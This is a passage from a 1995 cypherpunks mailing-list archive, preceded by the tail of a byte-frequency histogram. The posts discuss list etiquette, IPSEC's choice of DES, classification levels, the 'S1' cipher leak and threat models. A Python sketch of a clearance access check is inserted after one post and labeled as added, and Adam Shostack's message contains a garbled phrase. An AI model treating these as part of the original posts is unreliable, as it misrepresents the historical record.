96 = 17315002 (1.032) ******************************************************
97 = 17496333 (1.043) ******************************************************
98 = 17462597 (1.041) ******************************************************
99 = 17171624 (1.024) *****************************************************
9a = 17129454 (1.021) *****************************************************
9b = 17732485 (1.057) *******************************************************
9c = 17530069 (1.045) ******************************************************
9d = 17230662 (1.027) *****************************************************
9e = 16922821 (1.009) ****************************************************
9f = 17745136 (1.058) *******************************************************
a0 = 17581410 (1.048) ******************************************************
a1 = 17321733 (1.032) ******************************************************
a2 = 16964145 (1.011) *****************************************************
a3 = 17368560 (1.035) ******************************************************
a4 = 17308962 (1.032) ******************************************************
a5 = 17057799 (1.017) *****************************************************
a6 = 17479242 (1.042) ******************************************************
a7 = 17662293 (1.053) *******************************************************
a8 = 17628237 (1.051) *******************************************************
a9 = 17334504 (1.033) ******************************************************
aa = 17291934 (1.031) ******************************************************
ab = 17900685 (1.067) *******************************************************
ac = 17696349 (1.055) *******************************************************
ad = 17394102 (1.037) ******************************************************
ae = 17083341 (1.018) *****************************************************
af = 17913456 (1.068) *******************************************************
b0 = 17048640 (1.016) *****************************************************
b1 = 16796832 (1.001) ****************************************************
b2 = 16450080 (0.981) ***************************************************
b3 = 16842240 (1.004) ****************************************************
b4 = 16784448 (1.000) ****************************************************
b5 = 16540896 (0.986) ***************************************************
b6 = 16949568 (1.010) ****************************************************
b7 = 17127072 (1.021) *****************************************************
b8 = 17094048 (1.019) *****************************************************
b9 = 16809216 (1.002) ****************************************************
ba = 16767936 (0.999) ****************************************************
bb = 17358240 (1.035) ******************************************************
bc = 17160096 (1.023) *****************************************************
bd = 16867008 (1.005) ****************************************************
be = 16565664 (0.987) ***************************************************
bf = 17370624 (1.035) ******************************************************
c0 = 16705850 (0.996) ****************************************************
c1 = 16459105 (0.981) ***************************************************
c2 = 16119325 (0.961) **************************************************
c3 = 16503600 (0.984) ***************************************************
c4 = 16446970 (0.980) ***************************************************
c5 = 16208315 (0.966) **************************************************
c6 = 16608770 (0.990) ***************************************************
c7 = 16782705 (1.000) ****************************************************
c8 = 16750345 (0.998) ****************************************************
c9 = 16471240 (0.982) ***************************************************
ca = 16430790 (0.979) ***************************************************
cb = 17009225 (1.014) *****************************************************
cc = 16815065 (1.002) ****************************************************
cd = 16527870 (0.985) ***************************************************
ce = 16232585 (0.968) **************************************************
cf = 17021360 (1.015) *****************************************************
d0 = 16949520 (1.010) ****************************************************
d1 = 16699176 (0.995) ****************************************************
d2 = 16354440 (0.975) ***************************************************
d3 = 16744320 (0.998) ****************************************************
d4 = 16686864 (0.995) ****************************************************
d5 = 16444728 (0.980) ***************************************************
d6 = 16851024 (1.004) ****************************************************
d7 = 17027496 (1.015) *****************************************************
d8 = 16994664 (1.013) *****************************************************
d9 = 16711488 (0.996) ****************************************************
da = 16670448 (0.994) ****************************************************
db = 17257320 (1.029) *****************************************************
dc = 17060328 (1.017) *****************************************************
dd = 16768944 (1.000) ****************************************************
de = 16469352 (0.982) ***************************************************
df = 17269632 (1.029) *****************************************************
e0 = 16953650 (1.011) ****************************************************
e1 = 16703245 (0.996) ****************************************************
e2 = 16358425 (0.975) ***************************************************
e3 = 16748400 (0.998) ****************************************************
e4 = 16690930 (0.995) ****************************************************
e5 = 16448735 (0.980) ***************************************************
e6 = 16855130 (1.005) ****************************************************
e7 = 17031645 (1.015) *****************************************************
e8 = 16998805 (1.013) *****************************************************
e9 = 16715560 (0.996) ****************************************************
ea = 16674510 (0.994) ****************************************************
eb = 17261525 (1.029) *****************************************************
ec = 17064485 (1.017) *****************************************************
ed = 16773030 (1.000) ****************************************************
ee = 16473365 (0.982) ***************************************************
ef = 17273840 (1.030) *****************************************************
f0 = 16573690 (0.988) ***************************************************
f1 = 16328897 (0.973) ***************************************************
f2 = 15991805 (0.953) *************************************************
f3 = 16373040 (0.976) ***************************************************
f4 = 16316858 (0.973) **************************************************
f5 = 16080091 (0.958) **************************************************
f6 = 16477378 (0.982) ***************************************************
f7 = 16649937 (0.992) ****************************************************
f8 = 16617833 (0.991) ***************************************************
f9 = 16340936 (0.974) ***************************************************
fa = 16300806 (0.972) **************************************************
fb = 16874665 (1.006) ****************************************************
fc = 16682041 (0.994) ****************************************************
fd = 16397118 (0.977) ***************************************************
fe = 16104169 (0.960) **************************************************
ff = 16886704 (1.007) ****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 10 Aug 95 05:29:41 PDT
To: cypherpunks@toad.com
Subject: ciphergroupies
Message-ID: <v02120d01ac4f9581290f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


As one of ciphergroupies (call a spade a spade, the man said, and, frankly,
I don't write code, much less crypto-code) I agree with Perry.

While I understand that crypto isn't the only thing discussed on this list,
it used to be quite apparent to anyone who signed on to this list that strong
crypto and its consequences was the focus of the group.  Some days it's
very apparent that that is not the focus.

My mail.torrent skills are pretty well advanced these days, because I sit
on lots of mail groups. The first high volume one was cypherpunks, where I
got my bones in such matters, and I've gotten pretty adept at thrashing the
noise out of the way. However, it does seem that, like Tim said a while
ago, we're getting a lot of forwards from other groups, which dilute the
content here pretty significantly.

I've done this myself. A lot. Not as much as I used to, but it still
happens: I just forwarded here an announcement for a digital commerce
conference in Texas, for instance.

So, I have a few suggestions. First, we might try to be more considerate of
the other's wetware, while developing our own, and try to limit our
postings to this net to original contributions where possible, even if it's
just a summary of something you've read. Write it in your own words, in
other words ;-). I'm not saying rewrite instead of forward if the message
is extremely crypto (or consequent) relevant, we get action messages from
EPIC, for instance, which are mostly relevant (opinions of the efficacy of
EPIC aside, of course).

Second, if you have something which people here might be interested in, and
it's vaguely tangential, post a pointer.  The classic case here is someone,
who shall remain nameless for reasons you'll see in a moment, whose
brilliantly cryptic (!) pointers to his droid-fed article stash have been a
very useful and pleasantly salient feature of the landscape here for more
than a year now.

You can point to an FTP file, a web page, have people ask for it in an
e-mail reply from you, and if it's something er, professionally written,
and want it handled er, gingerly, you can probably contact the above
mentioned droid-master for his help in distributing your find. I just sent
him such an article on dark fiber / frequency multiplexing which he pointed
the group to within the last week. Not that you should choke the droid
factory, mind you, but it can be done in a special circumstance.

Perry seems pretty burned up, and he's burned up for the right reasons, not
the least of which is that he's been busting his butt in a project which
will encrypt the net at the very core: the TCP/IP layer itself. This is
very very important, and people should pay attention to it, and help
however they can. (It's also likely to make Perry insufferable --
deservedly -- pretty soon ;-)). Like everyone else, he subscribes to this
group to learn more about crypto, and he's finding the crypto content
dwindling, the "S1" discussion notwithstanding, and as someone who's
invested a lot of time, energy, and emotions in this group, he doesn't
sound happy about it.

This is also compounded by the fact that while Perry is one of my favorite
people here, Perry is also a grouch. I usually laugh when he goes over the
top about something, because his polemics are some of the best I've ever
seen. That doesn't make it any better if you're on the receiving end of
such invective, and he's pissed off people who agree with him most of the
rest of the time as a result. He's usually right, however, and he's a
grownup, so I don't think he's going to change his tone anytime soon, and
I've just learned to ignore his more inflammatory remarks as a cost of doing
business with his not inconsiderable talents.  That goes for several people
around here, by the way, and it's a shame when they don't play well with
others, but, like Perry, they're grownups. Another cost of doing business.

So, in summary, point instead of forward where possible, particularly if
it's not explicitly crypto or crypto consequent; a good immediate way to
help the cause of crypto on the net is to bone up on this IPSP stuff and
see what you can do to help, because it's very important; and Perry and
other people here are grouches and can't seem to play nice with each other
on occasion (So, what else is new? ;-)).

Cheers,
Bob Hettinga







-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Aug 95 06:00:28 PDT
To: cypherpunks@toad.com
Subject: CAC_kle
Message-ID: <199508101300.JAA14840@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-10-95. NYPaper Page-Oner:


   "With Internet Cachet, Not Profit, New Stock Is Wall St.'s
   Darling."

      A 15-month-old company that has never made a dime of
      profit had one of the most stunning debuts in Wall
      Street history yesterday as investors rushed to pour
      their money into cyberspace. The Netscape Communications
      Corporation became the latest -- and hottest -- company
      in the Internet business to list shares on the nation's
      stock exchanges. Shares of Netscape, which had been
      priced at $28 before trading began at 11 A.M. opened far
      higher -- at $71. The shares soon surged to as high as
      $74.75. It was the best opening day for a stock in Wall
      Street history for an issue of its size. But even more
      significantly, it was a sign of how the rush to
      commercialize the global computing web known as the
      Internet has created an investor frenzy not seen in the
      technology industry since the early days of the personal
      computer more than a decade ago. "There is a mania under
      way," said Michael Murphy, the editor of The Overpriced
      Stock Service, a newsletter in Half Moon Bay, Calif.

      The company's co-founder and chairman, who holds 9.7
      million shares, ended up holding a stake valued at a
      half-billion dollars. Making his first fortune yesterday
      was Marc L. Andreessen, Netscape's 24-year-old vice
      president of technology and an inventor of its prize
      software. Based on yesterday's closing price, his
      interest in Netscape is worth more than $58 million.


   CAC_kle











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Thu, 10 Aug 95 06:10:07 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might
Message-ID: <9508101310.AA25693@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> On a fair number of occasions I have been told that federal type folks
> have made statements to the effect that there is no such thing as a "TOP
> SECRET" classification of US government docs. Since really secret things
> tend to get neither confirmed nor denied, I am inclined to believe this.
> Thus SECRET is the top classification in today's government/military. If
> anybody knows otherwise I would be interested in the information.
> JWS

Well, I held an active SECRET clearance until last November. This is 
how I remember it.

There are three basic levels of classification - 
Confidential, Secret, and Top Secret. There are many sub-categories,
such as FOUO (For Official Use Only), NOFORN (no foreigners), COMSEC
(Communications Security) etc. Within TS, data may be placed in 
'compartments', the names of which may themselves be classified, and 
separate clearance is needed for each compartment. 

Orthogonal to that is the existence of three separate agencies which
provide clearance - the Department of Energy, the Department of 
Defense, and the NSA. If you had a DoD clearance, that did not cut 
much ice with the spooks - you needed to have a separate 
investigation to their standards (though the actual groundpounding and 
investigation was done by the same organization for all three).

Finally, there was 'need to know'. It didn't matter if you had a Tippy
Toppest Secret clearance, signed by the directors of the NRO, NSA, 
and DoE; if there was a piece of classified information which was not
relevant to your work, you didn't get it. (One of the problems with 
the system is that this leads to a lot of duplicated effort).

While I did not get to see Top Secret data (and in fact, avoided 
classified projects whenever possible), TS was a very real 
classification level at least until late last year. The only 
explanation I can think of for your claim above is that most TS data is 
not simply 'TS'; it usually has various endorsements, such as 
which compartment it's in. 

Peter Trei
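
The layers described in the message above (a clearance per granting agency, a level, compartments, then need-to-know) can be read as one access check in which every layer must pass. An added Python sketch of that model follows; it is not part of the original post and not any agency's actual rules, and the compartment names, project tags and people are constructed.

```python
from dataclasses import dataclass, field
from enum import IntEnum


class Level(IntEnum):
    # The three basic levels named in the message, ordered low to high.
    CONFIDENTIAL = 1
    SECRET = 2
    TOP_SECRET = 3


@dataclass(frozen=True)
class Clearance:
    level: Level
    compartments: frozenset = frozenset()   # compartments the holder is read into


@dataclass
class Subject:
    name: str
    clearances: dict                                  # granting agency -> Clearance
    need_to_know: set = field(default_factory=set)    # project tags (constructed)


@dataclass(frozen=True)
class Document:
    title: str
    agency: str              # whose clearance standard applies
    level: Level
    compartments: frozenset  # every listed compartment is required
    project: str             # the work the information is relevant to


def check_access(subject, doc):
    """Return (allowed, reason). The first failing layer is reported."""
    # 1. A clearance from one agency does not carry over to another.
    clearance = subject.clearances.get(doc.agency)
    if clearance is None:
        return False, f"no clearance granted by {doc.agency}"
    # 2. Level dominance: the clearance must be at or above the document level.
    if clearance.level < doc.level:
        return False, (f"{clearance.level.name} clearance is below "
                       f"{doc.level.name}")
    # 3. Compartments: a separate clearance is needed for each one.
    missing = doc.compartments - clearance.compartments
    if missing:
        return False, "not cleared for compartment(s): " + ", ".join(sorted(missing))
    # 4. Need-to-know applies even when every clearance check passes.
    if doc.project not in subject.need_to_know:
        return False, f"no need to know for project {doc.project}"
    return True, "access permitted"


# Constructed sample data.
ALICE = Subject(
    name="alice",
    clearances={"DoD": Clearance(Level.TOP_SECRET, frozenset({"ALPHA"}))},
    need_to_know={"radar"},
)
BOB = Subject(
    name="bob",
    clearances={"DoD": Clearance(Level.SECRET)},
    need_to_know={"radar"},
)

DOCS = {
    "ok": Document("radar spec", "DoD", Level.TOP_SECRET,
                   frozenset({"ALPHA"}), "radar"),
    "other_agency": Document("sigint note", "NSA", Level.SECRET,
                             frozenset(), "radar"),
    "two_compartments": Document("joint study", "DoD", Level.TOP_SECRET,
                                 frozenset({"ALPHA", "BRAVO"}), "radar"),
    "other_project": Document("sonar memo", "DoD", Level.CONFIDENTIAL,
                              frozenset(), "sonar"),
}

if __name__ == "__main__":
    for key, doc in DOCS.items():
        print("alice", key, check_access(ALICE, doc))
    print("bob", "ok", check_access(BOB, DOCS["ok"]))
```
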





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 10 Aug 95 06:28:38 PDT
To: asb@nexor.co.uk (Andy Brown)
Subject: Re: Why DES in IPSEC ESP?
In-Reply-To: <Pine.SOL.3.91.950810133448.4480H-100000@eagle.nexor.co.uk>
Message-ID: <199508101327.JAA14573@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| I suppose this is really addressed at Perry:
| 
| Why was (single) DES chosen as the algorithm for the ESP part of IPSEC? 
| If someone's IP traffic is being monitored and collected offline by some
| agency then they're going to get about a couple of hours of security while
| the special purpose key search hardware kicks into action.  I know other
| algorithms can optionally be used, but surely it would have been better to
| have a second, stronger algorithm specified mandatory as well. 

	Since Perry is hopefully off busily implementing things, I'll
try to answer. :)

	First, DES is still pretty strong.  Try throwing Pentiums at
it.  It suffices as a fast, known to be reasonably strong, block
ethernet sniffers algorithm.

	Second, no other algorithm is known to be well designed.  We
can trust that the NSA did a fair job in the design.  Thus, choosing a
second algorithm is a difficult, and political task.  (There are also
patent and licensing issues with other ciphers)

	So, in order to ship sooner rather than later, DES was chosen.
3DES will probably be available soon afterwards.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Thu, 10 Aug 95 07:44:01 PDT
To: cypherpunks@toad.com
Subject: commercial advance vcrs
Message-ID: <199508101453.JAA01058@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


This isn't directly relevant to crypto, but it is a scheme to allow people
to filter out unwanted media content.  Has anyone heard of it, and does
anyone know how it works? 

This is from TV Guide:

CHEERS to commercial-free TV, or more exactly, Commercial Advance VCRs.  
Check it out:  this month, RCA will unveil a VCR that skips past 
virtually all commercials during playback of a recorded show.  Imagine:  
three minutes of commercials will whiz by in 10 seconds.  The downside?  
This summer, commercials may be the most interesting things on network 
tv.

--
Alex Strasheim, alex@proust.suba.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 10 Aug 95 08:56:29 PDT
To: cypherpunks@toad.com
Subject: noise pollution, conspiracy theory, Perry's pet peeve
Message-ID: <199508101556.JAA06190@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> You have become an impediment -- a lump of rock in the highway. You aren't
> part of the solution -- you are part of the problem.


I have to concur on this point.  Posting conspiracy tracts to cypherpunks, or
posting algorithm ideas to the conspiracy list, only serves to dilute the
primary function of the list in question.


J. Orlin Grabbe's actions in this respect are harmful (though of course
I don't think they are malicious.)


Bryce
signatures follow:

                                +
                                 /.       island Life in a chaos sea
                                 /             bryce.wilcox@colorado.edu
                                 ---*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMCosBvWZSllhfG25AQFWlQQAocyn68Ehj6S2gGvPnhnMglrWdKFsw3s8
+eJWlMMVsXfV7NVAezoxVaia5Uw0kXCc0liQRmXz/T5jJQHI/ko2PxQQ7PI2TeRa
RiEM327boHr87WrtJO+3jInqjGDgjKkiBXW07QNZjvZudlEdm05XLGtJeVSRmIFJ
xKvbLVj5v5M=
=B1KZ
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Thu, 10 Aug 95 07:39:58 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: ciphergroupies
In-Reply-To: <v02120d01ac4f9581290f@[199.0.65.105]>
Message-ID: <199508101435.KAA03188@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> As one of ciphergroupies (call a spade a spade, the man said, and, frankly,
> I don't write code, much less crypto-code) I agree with Perry.

For anyone who is interested in writing code and other related
activities I'm willing to redistribute the cypherpunks from my site via
MailWeir so users can kill and prune what messages they read and which
ones they don't.


/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 07:52:58 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: IPSEC goes to RFC
In-Reply-To: <199508100310.XAA11723@bwh.harvard.edu>
Message-ID: <199508101452.KAA24637@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> | IPSEC is now a Proposed Standard.
> 
> | Again, *we need your help*. Cypherpunks write code. Help us make the
> | internet safe for personal privacy by contributing to this effort.
> 
> 	How about posting a list of 'things that need doing?'  I
> assume one is floating around, possibly even with time estimates?

The IETF was challenged by Steve Crocker to be ready for use of IPSEC
for the Dallas meeting in December so that no IETFer who wanted to
communicate securely with his home site need be insecure.

To accomplish that, we need to produce versions of the security stack
for many architectures. Right now, we have AIX and 4.4BSD fairly
solidly covered. Less well covered is HPUX. People familiar with code
like the Trumpet Winsock stack, Linux, or who have access to the
innards of SunOS, Solaris, Windows 95, Mac stacks, and others, and can
legitimately release implementations for those platforms, are probably
needed. We need serious commitments from people but of course everyone
is trying to help everyone else along.

Basically, if you know how to hack kernels and networking code and you
have a platform you can work on, we need you.

We also lack work on the key management end of things -- people who
can start playing around with implementing Photuris, even on a "toy"
basis, would probably be of help.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Thu, 10 Aug 95 08:01:10 PDT
To: cypherpunks@toad.com
Subject: Re: Dir.Byway Virus (NewsClip)
Message-ID: <199508101500.LAA20644@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




turner@telecheck.com writes:
>Seems like a good-press piece for a small anti-viral software
>company.  Just one small pick to nit:

Actually, Dr. Sol's AVTK is consistently one of the very top DOS virus
scanners, in terms of percent of known viruses it catches.

>anonymous-remailer@shell.portal.com said:
>> Bitton said the company's "Dr. Solomon's Anti-Virus Toolkit" will 
>> remove the virus from infected computers. New versions of the Toolkit 
>> for DOS, Windows, OS/2, and NetWare are slated to ship in late 
>> summer. S&S also plans Fall 1995 introductions of Toolkits for 
>> Macintosh, SCO Unix, Windows 95, and Windows NT server and 
>> workstations.
>
>Windows NT has an abstracted and object oriented design.  User mode
>programs no longer have access to the hardware (ie., you no longer
>have access to the boot sector, and cannot hook an interrupt).  In
>short, viruses are much less likely to function under NT, yet these
>blood-sucking people can't wait to introduce software for it...

I can't speak for S&S, but I'd bet that what they are introducing is
a scanner for archives of MS-DOS programs hosted on NT systems.
Although it may be that NT-specific viruses have started appearing.
(The restrictions on file access don't slow the spread of file
infectors all that much -- it's enough for them to infect those things
they have write permission for.  I think the good Dr. Cohen has done
some research on this?)

In any case, this is more appropriate for comp.virus than cpunks.

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 10 Aug 95 03:15:19 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system
In-Reply-To: <199508100443.EAA00611@orchard.medford.ma.us>
Message-ID: <Pine.SOL.3.91.950810110954.4480E-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Bill Sommerfeld wrote:
 
> It looks very much like the sort of typo you would get from a
> mistranslation from assembly language if the target architecture had a
> *4-bit* processor. (This is also consistent with the "<<4"'s which
> show up in several places in the code).

I'll back up the disassembly theory.  I've done it myself once when I 
lost some of my own source code from years previous and had to get out 
the disassembler.  Very painful work which resulted in a first set of 
source much like the "S1" sample posted here.  Only difference was that I 
went back over the "first draft" after verifying it and cleaned it up 
somewhat.

The poster either does not know 'C' or thinks that a cleanup will reveal 
his/her style.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 08:26:57 PDT
To: Andy Brown <asb@nexor.co.uk>
Subject: Re: Why DES in IPSEC ESP?
In-Reply-To: <Pine.SOL.3.91.950810133448.4480H-100000@eagle.nexor.co.uk>
Message-ID: <199508101521.LAA05002@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Andy Brown writes:
> I suppose this is really addressed at Perry:
> 
> Why was (single) DES chosen as the algorithm for the ESP part of IPSEC? 

It wasn't. Well, it wasn't *really*.

IPSEC is a framework into which you drop any algorithm you like --
IDEA, 3DES, Skipjack (:-), or anything else. We picked a baseline
algorithm to assure interoperability, but it is not our expectation
that people would want to use DES in practice. Picking DES was largely
a political, not a technical decision. RFCs describing 3DES and SHA
modes are in the pipeline right now -- they are going before the IESG
"real soon now".

> I know other algorithms can optionally be used, but surely it would
> have been better to have a second, stronger algorithm specified
> mandatory as well.

Well, let's remember this: algorithms go sour with time, like dairy
products. People are going to have to get used to regularly switching
them very soon anyway. Think of this as just a way to get people in
the habit of building their implementations modularly from the start.

My recommendation is that all implementations include 3DES in their
initial algorithm set. I'm going to do it with mine.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 08:25:44 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Why DES in IPSEC ESP?
In-Reply-To: <199508101327.JAA14573@bwh.harvard.edu>
Message-ID: <199508101525.LAA06371@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> choosing a second algorithm is a difficult, and political task.
[...]
> So, in order to ship sooner rather than later, DES was chosen.

Well, if you define "ship" as "get the standards approved" you have
the situation nailed. We basically could all agree on DES and the
marketplace will dictate that in practice everyone has 3DES and other
things available too.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mhobbs@rad.rpslmc.edu (Michael Hobbs)
Date: Thu, 10 Aug 95 09:59:56 PDT
To: cypherpunks@toad.com
Subject: questions/info on premail
Message-ID: <199508101701.AA09184@rad.rpslmc.edu>
MIME-Version: 1.0
Content-Type: text/plain


To all.

Is there anyone out there that has incorporated premail
into another script?  Like a mail script or cgi script.
I'm trying to expand the idea of integrating anon-mailers
into web pages for more ease of use.  If anyone has
directly linked premail to a page, please let me know.  I
am having some problems calling it from a script and I 
thought someone might have solved this problem already.

I wrote to Raph about this, but as you might know, his page
states that he got married on Aug 5, so I don't expect the
speediest of replies :)

Michael Hobbs
dochobbs@wwa.com
mhobbs@rad.rpslmc.edu

p.s.
As to the cpremailer page that I posted here last week;
-I have removed the hardwired remailer and now allow
simple choosing of remailers.  I also think I have the
news instructions up to date.
http://miso.wwa.com/~dochobbs/cpremailer.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 10 Aug 95 11:58:55 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <9508101902.AA15691@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>Jon writes:
>> Two other possibilities: (1) It's merely an independently produced 
>> cryptosystem disguised as a "leak" to save its creator the trouble of 
>> asking experts to analyze it for him/her.  

>It strikes me as rather foolish to mail off anonymous copies to several
>individual recipients (Matt, Perry, Tim, ...) in addition to the list, if
>S1 is a real leak. Why aid the traffic analysts by firing off multiple
>messages through the remailers ?

A third possibility comes to mind, that person or persons associated with
the list are using the post to focus on cryptographic efforts in lieu of
political or apocalyptic diatribes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Thu, 10 Aug 95 09:10:56 PDT
To: cypherpunks@toad.com
Subject: Re: Why DES in IPSEC ESP?
Message-ID: <199508101611.MAA03223@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


>> | Why was (single) DES chosen as the algorithm for the ESP part of IPSEC? 

Because people were going completely nuts about mandating something
not easily specifiable at all.  DES was an easier case to make than
3DES.

>> 	So, in order to ship sooner rather than later, DES was chosen.
>> 3DES will probably be available soon afterwards.

Shipping is irrelevant.  Perry is busily coding 3DES support into
NetBSD.  Once it's in the bsd network stack, it will spread
everywhere.  Presumably, someone will implement it outside the US as
well.

As Perry put it succinctly at a recent IETF meeting, people will not
necessarily use what is mandated.  They will use what is available.
If 3DES is in the freely available reference implementation (which it
will be), and it performs adequately, that is what will get used.

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 09:16:55 PDT
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: IPSEC goes to RFC
In-Reply-To: <m0sgafh-0009yuC@sdwsys>
Message-ID: <199508101615.MAA11483@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Stephen D. Williams writes:
> Could we please share snapshots of any code that exists?  Even if it's
> for a totally different OS, it's still extremely helpful if we're short
> on time.

That's certainly something people expect to do -- I'll begin letting
people at my code in a couple of weeks.

There is a mailing list for IPSEC developers right now -- people who
have read the RFCs and decide to get serious might want to subscribe.

> I'm interested in doing/helping with Linux.  I also have access to
> an SGI Indy (less well ready to develop though) and HPUX.

Kernel sources are important here -- if you don't have kernel sources
IPSEC may be a challenge to put into a kernel...

> Does it make any sense to talk about loopback interface style wedges to
> convert OS native IP to IPSEC?  What about a version of inetd that
> wraps apps?

Steve Bellovin has a summer student who did an interesting wedge on
PCs running packet driver interfaces in which he interposed his stuff
between the stack and the real packet driver. However, this can only
be of use for host-host keying and not user-user which is the real goal.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 10 Aug 95 12:10:02 PDT
To: John Young <cypherpunks@toad.com
Subject: Conspiracies and "Ciphergroupies"
Message-ID: <ac4f9f9703021004675d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:57 PM 8/10/95, John Young wrote:
>   I respect the view that sound crypto requires skeptical
>   review and testing outside closed rooms. Conspiracies live
>   or die by the same process. Crypto would die if there was
>   no belief in conspiracies.
>
>   Conspiracy theory drives the cypherpunk agenda, I surmised
>   from the welcoming statement. Note the caution about "S1,"
>   and any other crypto offering.

I think a better, and less loaded, term than "conspiracies" is "threat models."

It has always been important to many of us that the policies and plans of
potential threats be discussed, analyzed, etc. Thus, our recurring focus on
the activities of the NSA, GCHQ, FinCEN, and so on. For example, all folks
on this list should almost certainly read "The Puzzle Palace," even though
it does not _directly_ help with the latest project in writing code.

And like Orlin Grabbe, whose "End of Money" article I posted a pointer to
last winter, I closely follow the recent developments involving the
intelligence agencies, the plans to limit crypto, etc.

(By the way, it was my close following of the NSA and related
organizations, and my monitoring of what Dorothy Denning was saying, that
led to my "A Trial Balloon to Ban Crypto?" article in this group and in
sci.crypt three years ago. This warning, which generated much discussion on
sci.crypt and here, prepared us for the Clipper announcement six months
later.)

Is this wasted time? Shouldn't I be using my time to write Trumpet
Winsocks--whatever they are!--for WinCypherHyperPhone?

Well, we all decide what our interests are, and exhortations by others that
we are not working on what is "really" important are not very useful. There
are probably a dozen different sorts of interests here, ranging from a
bunch of folks interested in popularizing crypto to several law professors
and lawyers interested in legal aspects to Internet programming experts.
Even some pure mathematicians. Even some novices.


>   Perry's sharp statements on the urgent need for crypto
>   deployment are motivated, it seems to me, by a view of a
>   believable, if not wholly proveable, threat that crypto is
>   believed to counter. I choose to believe him; Orlin's got my
>   skeptical interest -- put up or shut up -- and he's not out
>   of line.

Perry is Perry. He has certainly written his share of rants and "off-topic"
posts, as have we all. Literally thousands of his posts over the past 3
years reside on my disk drives, and certainly until recently most of them
were not about writing code.

Ironically, just a few weeks ago, Perry was sharply criticizing me for my
"Crisis Overload" post and was urging me to join him in a serious lobbying
effort to undermine the Grassley bill. I declined, thinking it unlikely to
succeed and preferring to concentrate on my other project (including a new
release of SmalltalkAgents, just arrived). When I preferred to work on more
technical things than launching a grassroots political campaign, he got
abusive and insulting in e-mail and I told him I would no longer accept
this sort of abuse. You may recall he chose to post this private message
